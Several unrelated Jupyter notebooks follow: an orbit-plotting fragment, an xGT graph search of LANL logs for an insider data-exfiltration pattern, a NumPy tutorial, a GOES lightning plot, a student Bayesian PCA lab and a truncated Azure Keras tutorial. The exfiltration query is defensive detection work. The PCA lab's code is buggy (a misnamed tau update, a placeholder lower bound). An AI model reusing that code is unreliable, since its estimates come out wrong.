# convert data time to phase P = troup_row['PERIOD'] * u.day t0 = atime.Time(troup_row['T0'], format='jd') # TODO: is this Barycentric? data_phase = ((data_t - t0) / P) % 1. # get orbital parameters ecc = troup_row['ECC'] K = troup_row['SEMIAMP']*u.m/u.s print(K) mf,asini = SimulatedRVOrbit.P_K_ecc_to_mf_asini_ecc(P, K, ecc) omega = troup_row['OMEGA']*u.degree phi0 = 2*np.pi*t0.mjd / P.to(u.day).value * u.radian troup_orbit = SimulatedRVOrbit(P=P, a_sin_i=asini, ecc=ecc, omega=omega, phi0=phi0, v0=0*u.km/u.s) # remove long-period velocity trend from data v0 = troup_row['V0']*u.m/u.s acc = troup_row['SLOPE']*u.m/u.s/u.day v_trend = v0 + acc*data_t.jd*u.day data_rv = data_rv - v_trend # TODO: is this how the data are plotting in Troup? # generate times to evaluate model from minimum time to time + 1 period model_t = data_t.min() + atime.TimeDelta(np.linspace(0, P.value, 1024)*P.unit) model_rv = troup_orbit.generate_rv_curve(model_t).to(u.km/u.s) model_phase = ((model_t - t0) / P) % 1. idx = model_phase.argsort() ax.plot(model_phase[idx], model_rv[idx], **model_style) ax.plot(model_phase[idx]-1, model_rv[idx], **model_style) ax.plot(model_phase[idx]+1, model_rv[idx], **model_style) ax.errorbar(data_phase, data_rv.value, data_rv_err.value, **data_style) ax.set_xlim(-0.1,1.1) ax.set_xlabel("Phase") ax.set_ylabel("RV [km/s]") ax.set_title(apogee_id) # fig.savefig(os.path.join(PLOT_PATH, "{}.png".format(troup_row['APOGEE_ID'].astype(str))), dpi=72) ```
github_jupyter
# Insider Exfiltration ---- We are looking for this graph pattern in the large data graph referred to as the [LANL Unified Host and Network Dataset](https://datasets.trovares.com/cyber/LANL/index.html), a set of netflow and host event data collected on an internal Los Alamos National Lab network. The LANL dataset consists of: - Netflow data (aggregated and sessionized) - Windows Logging Events - 1: events that involve exactly one device such as *reboot* - Windows Logging Events - 2: events that involve exactly two devices such as *failed authentication attempt from device A to device B* ## Motivation for graph pattern This notebook shows one kind of *graph pattern search* following the recommendations of the [Common Sense Guide to Mitigating Insider Threats, Fifth Edition](https://resources.sei.cmu.edu/asset_files/TechnicalReport/2016_005_001_484758.pdf). This graph pattern is motived by the following scenario: - An employee is working with a competitor to exfiltrate sensitive data - They do this by logging in to multiple systems within the enterprise that hold the sensitive data - From each sensitive data store, they launch a program that sends data out to a common exfiltration target This pattern is shown here: <img src="images/insider-xfil.png" alt="Insider Exfiltration" /> where: - the red edges from A to B, C, and D, are all *successful authentication* (login) events - the purple edges that are self-loops are all *program start* events - the black edges from B, C, and D to E are all netflow records with high byte counts going to the same destination port at device E. ---- ## Using xGT to perform this search The rest of this notebook demonstrates how to take this LANL data and the search pattern description to do these steps: 1. Ingest the cyber data into xGT 2. Search for all occurrences of this pattern. ``` import xgt conn = xgt.Connection() conn ``` ## Establish Graph Component Schemas We first try to retrieve the graph component schemas from xGT server. 
If that should fail, we create an empty component (vertex or edge frame) for the missing component. ``` try: devices = conn.get_vertex_frame('Devices') except xgt.XgtNameError: devices = conn.create_vertex_frame( name='Devices', schema=[['device', xgt.TEXT]], key='device') devices try: netflow = conn.get_edge_frame('Netflow') except xgt.XgtNameError: netflow = conn.create_edge_frame( name='Netflow', schema=[['epochtime', xgt.INT], ['duration', xgt.INT], ['srcDevice', xgt.TEXT], ['dstDevice', xgt.TEXT], ['protocol', xgt.INT], ['srcPort', xgt.INT], ['dstPort', xgt.INT], ['srcPackets', xgt.INT], ['dstPackets', xgt.INT], ['srcBytes', xgt.INT], ['dstBytes', xgt.INT]], source=devices, target=devices, source_key='srcDevice', target_key='dstDevice') netflow ``` **Edges:** The LANL dataset contains two types of data: netflow and host events. Of the host events recorded, some describe events within a device (e.g., reboots), and some describe events between devices (e.g., login attempts). We'll only be loading the netflow data and in-device events. We call these events "one-sided", since we describe them as graph edges from one vertex to itself. 
``` try: events1v = conn.get_edge_frame('Events1v') except xgt.XgtNameError: events1v = conn.create_edge_frame( name='Events1v', schema=[['epochtime', xgt.INT], ['eventID', xgt.INT], ['logHost', xgt.TEXT], ['userName', xgt.TEXT], ['domainName', xgt.TEXT], ['logonID', xgt.INT], ['processName', xgt.TEXT], ['processID', xgt.INT], ['parentProcessName', xgt.TEXT], ['parentProcessID', xgt.INT]], source=devices, target=devices, source_key='logHost', target_key='logHost') events1v try: events2v = conn.get_edge_frame('Events2v') except xgt.XgtNameError: events2v = conn.create_edge_frame( name='Events2v', schema = [['epochtime',xgt.INT], ['eventID',xgt.INT], ['logHost',xgt.TEXT], ['logonType',xgt.INT], ['logonTypeDescription',xgt.TEXT], ['userName',xgt.TEXT], ['domainName',xgt.TEXT], ['logonID',xgt.INT], ['subjectUserName',xgt.TEXT], ['subjectDomainName',xgt.TEXT], ['subjectLogonID',xgt.TEXT], ['status',xgt.TEXT], ['src',xgt.TEXT], ['serviceName',xgt.TEXT], ['destination',xgt.TEXT], ['authenticationPackage',xgt.TEXT], ['failureReason',xgt.TEXT], ['processName',xgt.TEXT], ['processID',xgt.INT], ['parentProcessName',xgt.TEXT], ['parentProcessID',xgt.INT]], source = 'Devices', target = 'Devices', source_key = 'src', target_key = 'logHost') events2v # Utility to print the sizes of data currently in xGT def print_data_summary(): print('Devices (vertices): {:,}'.format(devices.num_vertices)) print('Netflow (edges): {:,}'.format(netflow.num_edges)) print('Host event 1-vertex (edges): {:,}'.format(events1v.num_edges)) print('Host event 2-vertex (edges): {:,}'.format(events2v.num_edges)) print('Total (edges): {:,}'.format( netflow.num_edges + events1v.num_edges + events2v.num_edges)) print_data_summary() ``` ## Load the data If you are already connected to an xGT server with data loaded, this section may be skipped. You may skip ahead to the "**Utility python functions for interacting with xGT**" section. 
**Load the 1-sided host event data:** ``` %%time if events1v.num_edges == 0: urls = ["https://datasets.trovares.com/LANL/xgt/wls_day-85_1v.csv"] # urls = ["xgtd://wls_day-{:02d}_1v.csv".format(_) for _ in range(2,91)] events1v.load(urls) print_data_summary() ``` **Load the 2-sided host event data:** ``` %%time if events2v.num_edges == 0: urls = ["https://datasets.trovares.com/LANL/xgt/wls_day-85_2v.csv"] # urls = ["xgtd://wls_day-{:02d}_2v.csv".format(_) for _ in range(2,91)] events2v.load(urls) print_data_summary() ``` **Load the netflow data:** ``` %%time if netflow.num_edges == 0: urls = ["https://datasets.trovares.com/LANL/xgt/nf_day-85.csv"] #urls = ["xgtd://nf_day-{:02d}.csv".format(_) for _ in range(2,91)] netflow.load(urls) print_data_summary() ``` ## Utility python functions for interacting with xGT ---- Now define some useful functions and get on with the querying ... ``` # Utility function to launch queries and show job number: # The job number may be useful if a long-running job needs # to be canceled. 
import time def run_query(query, table_name = "answers", drop_answer_table=True, show_query=False): if drop_answer_table: conn.drop_frame(table_name) if query[-1] != '\n': query += '\n' query += 'INTO {}'.format(table_name) if show_query: print("Query:\n" + query) job = conn.schedule_job(query) print("Launched job {} at time: ".format(job.id, time.asctime())) conn.wait_for_job(job) table = conn.get_table_frame(table_name) return table ``` ## Looking for one path This query looks for only one path from A to E (through B) ``` %%time q = """ MATCH (E)<-[nf1:Netflow]-(B)<-[login1:Events2v]-(A), (B)<-[prog1:Events1v]-(B) WHERE A <> B AND B <> E AND A <> E AND login1.eventID = 4624 AND prog1.eventID = 4688 AND nf1.dstBytes > 100000000 // time constraints within each path AND login1.epochtime < prog1.epochtime AND prog1.epochtime < nf1.epochtime AND nf1.epochtime - login1.epochtime <= 30 RETURN count(*) """ data = run_query(q) print('Number of answers: {:,}'.format(data.get_data()[0][0])) ``` ## Looking for three paths This query looks for at least three paths from A to E (through B, C, and D) <img src="images/insider-xfil.png" alt="Insider Exfiltration" /> ``` %%time q = """ MATCH (E)<-[nf1:Netflow]-(B)<-[login1:Events2v]-(A), (B)<-[prog1:Events1v]-(B), (E)<-[nf2:Netflow]-(C)<-[login2:Events2v]-(A), (C)<-[prog2:Events1v]-(C), (E)<-[nf3:Netflow]-(D)<-[login3:Events2v]-(A), (D)<-[prog3:Events1v]-(D) WHERE A <> B AND A <> C AND A <> D AND A <> E AND B <> C AND B <> D AND B <> E AND C <> D AND C <> E AND D <> E AND login1.eventID = 4624 AND login2.eventID = 4624 AND login3.eventID = 4624 AND prog1.eventID = 4688 AND prog2.eventID = 4688 AND prog3.eventID = 4688 AND nf1.dstBytes > 100000000 AND nf2.dstBytes > 100000000 AND nf3.dstBytes > 100000000 // constraints across paths AND login1.epochtime < login2.epochtime AND login2.epochtime < login3.epochtime AND login3.epochtime - login1.epochtime < 3600 AND nf1.dstPort = nf2.dstPort AND nf2.dstPort = nf3.dstPort AND 
prog1.processName = prog2.processName AND prog2.processName = prog3.processName // time constraints within each path AND login1.epochtime < prog1.epochtime AND prog1.epochtime < nf1.epochtime AND nf1.epochtime - login1.epochtime <= 30 AND login2.epochtime < prog2.epochtime AND prog2.epochtime < nf2.epochtime AND nf2.epochtime - login2.epochtime <= 30 AND login3.epochtime < prog3.epochtime AND prog3.epochtime < nf3.epochtime AND nf3.epochtime - login3.epochtime <= 30 RETURN login1.epochtime as time1, login2.epochtime as time2, login3.epochtime as time3, login3.epochtime - login1.epochtime as interval, nf1.dstPort as dport1, nf2.dstPort as dport2, nf3.dstPort as dport3 """ data = run_query(q) print('Number of answers: {:,}'.format(data.num_rows)) pdata = data.get_data_pandas() pdata ```
github_jupyter
### Introduction To Numpy #### Wait... why am I learning this again? I already know lists! Untill now, we all know Python lists are powerful! <ul> <li>They can hold collection of values</li> <li>They can hold different types of data</li> <li>We can change, add or remove the items inside of a list</li> </ul> buttttt one important thing is missing. **the ability to perform a mathematical operation over *all* the items at the same time** Let's explore what I exactly mean by this. We have the heights and weights of my family members right here: ``` heights = [1.73, 1.68, 1.79, 1.92, 1.50, 1.64] weights = [90.0, 71.0, 55.0, 67.0, 99.2, 69] ``` If we want to calculate the BMI of each person, the fastest thing we hope that's gonna work would be the following: ``` weights/heights**2 ``` oh oh :( Python has no idea what we're talking about. well no worries, that's why we have **Numpy**! Numpy has its own array, which is an alternative for our regular Python lists. We simply call them **numpy arrays** [in case you haven't installed numpy, run the following cell] ``` !pip3 install numpy import numpy as np ``` Let's *convert* our previous lists into numpy arrays and see if we can perform the one-liner in line2! ``` heights_np = np.array(heights) heights_np weights_np = np.array(weights) weights_np weights_np/heights_np**2 ``` **Important Note : Numpy arrays can ONLY contain ONE data-type** ``` example = [2, 6.5, '4'] example_np = np.array(example) example_np ``` ##### Sum of two numpy arrays ``` weights_np + heights_np ``` ##### Numpy Array Subsetting ``` weights_np weights_np[3] ``` #### Task A list baseball has already been defined in the Python script, representing the height of some baseball players in centimeters. Can you add some code here and there to create a numpy array from it? ``` baseball = [180, 215, 210, 210, 188, 176, 209, 200] #INSERT YOUR CODE HERE ``` Use `np_height_m` and `np_weigh`t to calculate the **BMI** of each player. 
Use the following equation: `weight/height ** 2` Save the resulting numpy array as **bmi**. Print out bmi. ``` weights = [90.0, 71.0, 120.0, 97.0, 99.2, 100,90, 100] # Calculate the BMI: bmi # Print out bmi len(np_weight) ``` ### 2-D Arrays Usually our data is made up of **columns** and **rows**, meaning our data is *multidimensional* ``` months = [1, 2, 3] prices = [238.11, 237.81, 238.91] cpi_array = np.array([months, prices]) cpi_array ``` Wait how do we index our array now??! **array[row_index, column_index]** ``` #Insert Your Code Here ``` ✨What do you think this slice represents? `cpi_array[:, 2]` ``` cpi_array[:, 2] cpi_array[:, 1] cpi_array[0, :] ``` Your Answer ### Useful stuff we can do with numpy arrays - np.mean() - np.std() - np.arrange() - np.transpose() -> switches rows and columns *** - np.shape - np.size **Question : what's the difference between `shape` and `size`?** ``` array = np.array([[1,2,3,4], [1230, 2445, 3455, 34656]]) array array.shape array.size ``` ✨**Task** We have two lists (months and earnings) in the following cell. perform the following steps in order: - Create a 2D array of months and earnings and store in `arr` - Print the shape of arr - Print the size of arr - Slice out the earnings and save it in `arr_earnings` (row 1, all values of columns) - Calculate the mean of `arr_earnings` - Transpose `arr` and print it ``` months = [1,2,3,4,5] earnings = [3200, 5677, 8928, 1298, 2390] #INSERT YOUR CODE HERE ``` **Take aways from this notebook;** - How to create numpy arrays - How to sum numpy arrays - How to use numpy arrays
github_jupyter
# Plot the flash product of the GLM This jupyter notebook shows how to make a sub-region plot of the flash product of the GLM. Import the GOES package. ``` import GOES ``` Search GLM files. ``` flist=GOES.locate_files('/home/joao/Downloads/GOES-16/GLM/', 'OR_GLM*.nc', '20201019-235500', '20201020-000000') ``` Reads the files. ``` ds = GOES.open_mfdataset(flist) ``` Prints the contents of the files. ``` print(ds) ``` Set the map domain. ``` domain = [-100.0,-20.0,-40.0,40.0] ``` Gets longitude and latitude of flash product of GLM. ``` flash_lon = ds.variable('flash_lon') flash_lat = ds.variable('flash_lat') ``` Gets time interval between first and last file. ``` time_bounds = ds.variable('product_time_bounds') time_start = time_bounds.data[0,0] time_end = time_bounds.data[-1,-1] ``` Creates a grid map. ``` pix_resol = 2.0 gridmap_LonCor, gridmap_LatCor = GOES.create_gridmap(domain, PixResol=pix_resol) ``` Accumulates flash over grid map. ``` dens = GOES.accumulate_in_gribmap(flash_lon, flash_lat, gridmap_LonCor, gridmap_LatCor) ``` Gets information about data. ``` sat = ds.attribute('platform_ID')[0] ``` Sets product name. ``` name = 'Flash density' ``` Creates a custom color palette using the [custom_color_palette](https://github.com/joaohenry23/custom_color_palette) package. ``` # import packages import custom_color_palette as ccp # set the colors of the custom palette paleta1 = [['black'], [0,1]] paleta2 = [['yellow','darkorange','red','firebrick'], [1,5,10,15,20,25,30,40,50,60,70]] # pass parameters to the creates_palette module cmap, cmticks, norm, bounds = ccp.creates_palette([paleta1, paleta2], extend='max', lower_color='black', upper_color='maroon') # set ticks for colorbar ticks = cmticks ``` Creates plot. 
``` # import packages import numpy as np import cartopy.crs as ccrs from cartopy.feature import NaturalEarthFeature from cartopy.mpl.ticker import LatitudeFormatter, LongitudeFormatter import matplotlib.pyplot as plt from matplotlib.dates import DateFormatter # calculates the central longitude of the plot lon_cen = 360.0+(domain[0]+domain[1])/2.0 # creates the figure fig = plt.figure('map', figsize=(4,4), dpi=200) ax = fig.add_axes([0.1, 0.16, 0.80, 0.75], projection=ccrs.PlateCarree(lon_cen)) ax.outline_patch.set_linewidth(0.3) # add the geographic boundaries l = NaturalEarthFeature(category='cultural', name='admin_0_countries', scale='50m', facecolor='none') ax.add_feature(l, edgecolor='white', linewidth=0.25) # plot the data img = ax.pcolormesh(gridmap_LonCor.data, gridmap_LatCor.data, dens.data, cmap=cmap, norm=norm, transform=ccrs.PlateCarree()) # add the colorbar cb = plt.colorbar(img, ticks=ticks, extend='max', orientation='horizontal', cax=fig.add_axes([0.12, 0.05, 0.76, 0.02])) cb.ax.tick_params(labelsize=5, labelcolor='black', width=0.5, direction='out', pad=1.0) cb.set_label(label='{}'.format(name), size=5, color='black', weight='normal') cb.outline.set_linewidth(0.5) # set the title ax.set_title('{} - {} - [{}x{}km]'.format(sat, name, pix_resol, pix_resol), fontsize=7, loc='left') ax.set_title('{:%Y/%m/%d %H:%M UTC}\n{:%Y/%m/%d %H:%M UTC}'.format(time_start, time_end), fontsize=7, loc='right') # Sets X axis characteristics dx = 15 xticks = np.arange(domain[0], domain[1]+dx, dx) ax.set_xticks(xticks, crs=ccrs.PlateCarree()) ax.xaxis.set_major_formatter(LongitudeFormatter(dateline_direction_label=True)) ax.set_xlabel('Longitude', color='black', fontsize=7, labelpad=3.0) # Sets Y axis characteristics dy = 15 yticks = np.arange(domain[2], domain[3]+dy, dy) ax.set_yticks(yticks, crs=ccrs.PlateCarree()) ax.yaxis.set_major_formatter(LatitudeFormatter()) ax.set_ylabel('Latitude', color='black', fontsize=7, labelpad=3.0) # Sets tick characteristics 
ax.tick_params(left=True, right=True, bottom=True, top=True, labelleft=True, labelright=False, labelbottom=True, labeltop=False, length=0.0, width=0.05, labelsize=5.0, labelcolor='black') # Sets grid characteristics ax.gridlines(xlocs=xticks, ylocs=yticks, alpha=0.6, color='gray', draw_labels=False, linewidth=0.25, linestyle='--') # set the map limits ax.set_extent([domain[0]+360.0, domain[1]+360.0, domain[2], domain[3]], crs=ccrs.PlateCarree()) plt.show() ```
github_jupyter
# Lab 3: Bayesian PCA ### Machine Learning II, 2016 * The lab exercises should be made in groups of two people. * The deadline for part 1 is Sunday, 15 May, 23:59. * Assignment should be sent to taco.cohen at gmail dot com. The subject line of your email should be "[MLII2016] lab3part1_lastname1\_lastname2". * Put your and your teammates' names in the body of the email * Attach the .IPYNB (IPython Notebook) file containing your code and answers. Naming of the file follows the same rule as the subject line. For example, if the subject line is "[MLII2016] lab01\_Kingma\_Hu", the attached file should be "lab3part1\_Kingma\_Hu.ipynb". Only use underscores ("\_") to connect names, otherwise the files cannot be parsed. Notes on implementation: * You should write your code and answers in an IPython Notebook: http://ipython.org/notebook.html. If you have problems, please contact us. * Among the first lines of your notebook should be "%pylab inline". This imports all required modules, and your plots will appear inline. * NOTE: test your code and make sure we can run your notebook / scripts! * NOTE: please write your answers directly below the question in the notebook. ### Introduction In this lab assignment, we will implement a variational algorithm for Bayesian PCA. Unlike regular PCA based on maximization of retained variance or minimization of projection error (see Bishop, 12.1.1 and 12.1.2), probabilistic PCA defines a proper density model over observed and latent variables. We will work with a fully Bayesian model this time, which is to say that we will put priors on our parameters and will be interested in learning the posterior over those parameters. Bayesian methods are very elegant, but require a shift in mindset: we are no longer looking for a point estimate of the parameters (as in maximum likelihood or MAP), but for a full posterior distribution over the space of parameters. 
The integrals involved in a Bayesian analysis are usually analytically intractable, so that we must resort to approximations. In this lab assignment, we will implement the variational method described in Bishop99. Chapters 10 and 12 of the PRML book contain additional material that may be useful when doing this exercise. * [Bishop99] Variational Principal Components, C. Bishop, ICANN 1999 - http://research.microsoft.com/pubs/67241/bishop-vpca-icann-99.pdf Below, you will find some code to get you started. ``` import scipy.special as sp import numpy as np import numpy.linalg import math import numpy as np import matplotlib.pyplot as plt import matplotlib.cm as plt_cm import matplotlib.colors as plt_col import sklearn.datasets as ds import cPickle, gzip, numpy %matplotlib inline ``` ### 1. The Q-distribution (5 points) In variational Bayes, we introduce a distribution $Q(\Theta)$ over parameters / latent variables in order to make inference tractable. We can think of $Q$ as being an approximation of a certain distribution. What function does $Q$ approximate, $p(D|\Theta)$, $p(\Theta|D)$, $p(D, \Theta)$, $p(\Theta)$, or $p(D)$, and how do you see that from the equation $\ln p(D) = \mathcal{L}(Q) + \mathrm{KL}(Q||P)$? (Hint: see eq. 11 in Bishop99) $$P(\theta|D)$$ because that makes KL zero. ### 2. The mean-field approximation (15 points) Equation 13 from [Bishop99] is a very powerful result: assuming only that $Q(\Theta)$ factorizes in a certain way (no assumptions on the functional form of the factors $Q_i$!), we get a set of coupled equations for the $Q_i$. However, the expression given in eq. 13 for Q_i contains a small mistake. Starting with the expression for the lower bound $\mathcal{L}(Q)$, derive the correct expression (and include your derivation). You can proceed as follows: first, substitute the factorization of $Q$ (eq. 12) into the definition of $\mathcal{L}(Q)$ and separate $\mathcal{L}(Q)$ into $Q_i$-dependent and $Q_i$-independent terms. 
At this point, you should be able to spot the expectations $\langle\cdot\rangle_{k \neq i}$ over the other $Q$-distributions that appear in Bishop's solution (eq. 13). Now, keeping all $Q_k, k \neq i$ fixed, maximize the expression with respect to $Q_i$. You should be able to spot the form of the optimal $\ln Q_i$, from which $Q_i$ can easily be obtained. ### 3. The log-probability (10 points) Write down the log-prob of data and parameters, $\ln p(\mathbf{X}, \mathbf{Z}, \mathbf{W}, \mathbf{\alpha}, \tau, \mathbf{\mu})$, in full detail (where $\mathbf{X}$ are observed, $\mathbf{Z}$ is latent; this is different from [Bishop99] who uses $\mathbf{T}$ and $\mathbf{X}$ respectively, but $\mathbf{X}$ and $\mathbf{Z}$ are consistent with the PRML book and are more common nowadays). Could we use the log-prob to assess the convergence of the variational Bayesian PCA algorithm? If yes, how? If no, why not? ### 4. The lower bound $\mathcal{L}(Q)$ (25 points) Derive an expression for the lower bound $\mathcal{L}(Q)$ of the log-prob $\ln p(X)$ for Bayesian PCA, making use of the factorization (eq. 12) and the form of the Q-distributions (eq. 16-20) as listed in [Bishop99]. Show your steps. Implement this function. The following result may be useful: For $x \sim \Gamma(a,b)$, we have $\langle \ln x\rangle = \ln b + \psi(a)$, where $\psi(a) = \frac{\Gamma'(a)}{\Gamma(a)}$ is the digamma function (which is implemented in numpy.special). ### 5. Optimize variational parameters (50 points) Implement the update equations for the Q-distributions, in the __update_XXX methods. Each update function should re-estimate the variational parameters of the Q-distribution corresponding to one group of variables (i.e. either $Z$, $\mu$, $W$, $\alpha$ or $\tau$). Hint: if you run into numerical instabilities resulting from the gamma function use the gammaln function from numpy.special. 
``` class BayesianPCA(object): # X : data # def __init__(self, X, q=2, a_alpha=10e-3, b_alpha=10e-3, a_tau=10e-3, b_tau=10e-3, beta=10e-3): """ """ self.d = np.shape(X)[0] # number of dimensions self.N = np.shape(X)[1] # number of data points self.q = q self.X = X # data itself # Hyperparameters self.a_alpha = a_alpha self.b_alpha = b_alpha self.a_tau = a_tau self.b_tau = b_tau self.beta = beta # Variational parameters self.means_z = np.random.randn(q, self.N) # called x in bishop99 self.sigma_z = np.random.randn(q, q) self.means_mu = np.random.normal(0.0, 1.0, self.d) self.sigma_mu = np.random.randn(self.d, self.d) self.means_w = np.random.randn(self.d, self.q) self.sigma_w = np.random.randn(self.q, self.q) self.a_alpha_tilde = np.abs(np.random.randn(1)) self.b_alpha_tilde = np.abs(np.random.randn(self.q, 1)) self.a_tau_tilde = np.abs(np.random.randn(1)) self.b_tau_tilde = np.abs(np.random.randn(1)) def update(self): # compute gamma mean here as it's used in later updated self.gamma_mean = self.a_tau / self.b_tau self.__update_mu() self.__update_w() self.__update_z() self.__update_alpha() self.__update_tau() def __update_z(self): # updating covariance matrix I = np.eye(self.q) self.sigma_z = numpy.linalg.inv(I + self.gamma_mean * self.means_w.T.dot(self.means_w)) # updating mean ( note that mean is dependent on cov matrix computed previously) self.means_z = self.gamma_mean * self.sigma_z.dot(self.means_w.T).dot(self.X - self.means_mu[:, np.newaxis]) def __update_mu(self): # updating covariance matrix self.sigma_mu = math.pow(self.beta + self.N * self.gamma_mean, -1)*np.eye(self.d) # updating mean ( note that mean is dependent on cov matrix computed previously) mu = np.sum(self.X - self.means_w.dot(self.means_z),1) self.means_mu = self.gamma_mean * self.sigma_mu.dot(mu) def __update_w(self): alpha_mean = self.a_alpha_tilde/self.b_alpha_tilde alpha_mat = np.diag(alpha_mean) # updating covariance matrix z_cov = np.zeros((self.q,self.q)) for i in range(self.N): z = 
self.means_z[:,i] z = z[:,np.newaxis] z_cov += z.dot(z.T) self.sigma_w = np.linalg.inv(alpha_mat + self.gamma_mean * z_cov) # updating mean dif = self.X - self.means_mu[:, np.newaxis] self.means_w = (self.gamma_mean * self.sigma_w.dot(self.means_z.dot(dif.T))).T def __update_alpha(self): self.a_alpha_tilde = self.a_alpha + self.d/2 self.b_alpha_tilde = self.b_alpha + np.power(np.linalg.norm(self.means_w,axis=0),2)/2 def __update_tau(self): self.a_tau_tilde = self.a_tau + self.N * self.d/2 self.b_tau_tilda = 0 w = self.means_w ww = w.T.dot(w) mu_mean = self.means_mu for n in range(self.N): z_mean = self.means_z[:,n] x_n = self.X[:, n] self.b_tau_tilda += np.linalg.norm(x_n,ord=2)+mu_mean.T.dot(mu_mean) self.b_tau_tilda += np.trace(ww.dot(z_mean.dot(z_mean.T))) self.b_tau_tilda += 2 * mu_mean.T.dot(w).dot(z_mean) self.b_tau_tilda -=2*x_n.T.dot(w).dot(z_mean) - 2*x_n.T.dot(mu_mean) self.b_tau_tilda = self.b_tau + self.b_tau/2 # returns the squared difference error between reconstructed and the actual data def mse(self): d = self.X - self.transform() return np.linalg.norm(d, ord=2) def transform(self): return self.means_w.dot(self.means_z) + self.means_mu[:,np.newaxis] def L(self, X): L = 0.0 return L def fit(self, X): pass def plot_mse(mse): fig, ax = plt.subplots(figsize=(10, 4)) ax.plot(mse, linewidth=2, marker='s',markersize=5, markerfacecolor='red') ax.grid() ax.set_xlabel('Iteration') ax.set_ylabel('MSE') ``` ### 6. Learning algorithm (10 points) Implement the learning algorithm described in [Bishop99], i.e. iteratively optimize each of the Q-distributions holding the others fixed. What would be a good way to track convergence of the algorithm? Implement your suggestion. Test the algorithm on some test data drawn from a Gaussian with different variances in orthogonal directions. 
``` def run_on_gaussian_data(d=2,q=1,N=1000,maxit=10): # generating data C = 10*np.abs(np.random.rand(d,d)) mu = 10*np.abs(np.random.rand(d,1)) X = np.random.multivariate_normal(mu.flatten(), C, size=N) # running BPCA bppca = BayesianPCA(X,q) mse = [bppca.mse()] for i in xrange(maxit): bppca.update() mse.append(bppca.mse()) transformed = bppca.transform() # plotting (works only on 2d data) if d ==2: fig = plt.figure(num=None, figsize=(26, 12), dpi=80, facecolor='w', edgecolor='k') ax1 = fig.add_subplot(311) ax2 = fig.add_subplot(312) ax1.scatter(X[:,0], X[:,1], s=20) ax1.set_title("Original data") ax2.scatter(transformed[:,0], transformed[:,1], s=20) ax2.set_title("Transformed data") plot_mse(mse) plt.show() run_on_gaussian_data(d=100,N=1000,q=30) ``` ### 7. PCA Representation of MNIST (10 points) Download the MNIST dataset from here http://deeplearning.net/tutorial/gettingstarted.html (the page contains python code for loading the data). Run your algorithm on (part of) this dataset, and visualize the results. ``` # plots for MNIST dataset def plot_bppca_digits(X, q=700, maxit=7): # initial plot fig0, ax0 = plt.subplots(nrows=2, ncols=5, figsize=[15, 10]) ax0 = ax0.flatten() for i in xrange(10): ax0[i].matshow(X[i].reshape(28,28), cmap=plt_cm.gray) fig0.suptitle('Initial images', fontsize=20) np.random.seed(0) bppca = BayesianPCA(X,q) mse = [bppca.mse()] for i in xrange(maxit): print("iteration "+str(i+1)) bppca.update() mse.append(bppca.mse()) # transformed image transformed = bppca.transform() fig1, ax1 = plt.subplots(nrows=2, ncols=5, figsize=[15, 10]) ax1 = ax1.flatten() for i in xrange(10): ax1[i].matshow(transformed[i].reshape(28,28), cmap=plt_cm.gray) fig1.suptitle('Reconstructed images with q = '+str(q), fontsize=20) plot_mse(mse) plt.show() return bppca # loading digits f = gzip.open('mnist.pkl.gz') train_set, valid_set, test_set = cPickle.load(f) f.close() plot_bppca_digits(test_set[0][0:15],q=600) ```
github_jupyter
Copyright (c) Microsoft Corporation. All rights reserved. Licensed under the MIT License. ![Impressions](https://PixelServer20190423114238.azurewebsites.net/api/impressions/MachineLearningNotebooks/how-to-use-azureml/training-with-deep-learning/train-hyperparameter-tune-deploy-with-keras/train-hyperparameter-tune-deploy-with-keras.png) # Training, hyperparameter tune, and deploy with Keras ## Introduction This tutorial shows how to train a simple deep neural network using the MNIST dataset and Keras on Azure Machine Learning. MNIST is a popular dataset consisting of 70,000 grayscale images. Each image is a handwritten digit of `28x28` pixels, representing number from 0 to 9. The goal is to create a multi-class classifier to identify the digit each image represents, and deploy it as a web service in Azure. For more information about the MNIST dataset, please visit [Yan LeCun's website](http://yann.lecun.com/exdb/mnist/). ## Prerequisite: * Understand the [architecture and terms](https://docs.microsoft.com/azure/machine-learning/service/concept-azure-machine-learning-architecture) introduced by Azure Machine Learning * If you are using an Azure Machine Learning Notebook VM, you are all set. Otherwise, go through the [configuration notebook](../../../configuration.ipynb) to: * install the AML SDK * create a workspace and its configuration file (`config.json`) * For local scoring test, you will also need to have `tensorflow` and `keras` installed in the current Jupyter kernel. Let's get started. First let's import some Python libraries. 
``` %matplotlib inline import numpy as np import os import matplotlib.pyplot as plt import azureml from azureml.core import Workspace # check core SDK version number print("Azure ML SDK Version: ", azureml.core.VERSION) ``` ## Initialize workspace Initialize a [Workspace](https://docs.microsoft.com/azure/machine-learning/service/concept-azure-machine-learning-architecture#workspace) object from the existing workspace you created in the Prerequisites step. `Workspace.from_config()` creates a workspace object from the details stored in `config.json`. ``` ws = Workspace.from_config() print('Workspace name: ' + ws.name, 'Azure region: ' + ws.location, 'Subscription id: ' + ws.subscription_id, 'Resource group: ' + ws.resource_group, sep='\n') ``` ## Create an Azure ML experiment Let's create an experiment named "keras-mnist" and a folder to hold the training scripts. The script runs will be recorded under the experiment in Azure. ``` from azureml.core import Experiment script_folder = './keras-mnist' os.makedirs(script_folder, exist_ok=True) exp = Experiment(workspace=ws, name='keras-mnist') ``` ## Explore data Before you train a model, you need to understand the data that you are using to train it. In this section you learn how to: * Download the MNIST dataset * Display some sample images ### Download the MNIST dataset Download the MNIST dataset and save the files into a `data` directory locally. Images and labels for both training and testing are downloaded. 
``` import urllib.request data_folder = os.path.join(os.getcwd(), 'data') os.makedirs(data_folder, exist_ok=True) urllib.request.urlretrieve('http://yann.lecun.com/exdb/mnist/train-images-idx3-ubyte.gz', filename=os.path.join(data_folder, 'train-images.gz')) urllib.request.urlretrieve('http://yann.lecun.com/exdb/mnist/train-labels-idx1-ubyte.gz', filename=os.path.join(data_folder, 'train-labels.gz')) urllib.request.urlretrieve('http://yann.lecun.com/exdb/mnist/t10k-images-idx3-ubyte.gz', filename=os.path.join(data_folder, 'test-images.gz')) urllib.request.urlretrieve('http://yann.lecun.com/exdb/mnist/t10k-labels-idx1-ubyte.gz', filename=os.path.join(data_folder, 'test-labels.gz')) ``` ### Display some sample images Load the compressed files into `numpy` arrays. Then use `matplotlib` to plot 30 random images from the dataset with their labels above them. Note this step requires a `load_data` function that's included in an `utils.py` file. This file is included in the sample folder. Please make sure it is placed in the same folder as this notebook. The `load_data` function simply parses the compressed files into numpy arrays. ``` # make sure utils.py is in the same directory as this code from utils import load_data, one_hot_encode # note we also shrink the intensity values (X) from 0-255 to 0-1. This helps the model converge faster. X_train = load_data(os.path.join(data_folder, 'train-images.gz'), False) / 255.0 X_test = load_data(os.path.join(data_folder, 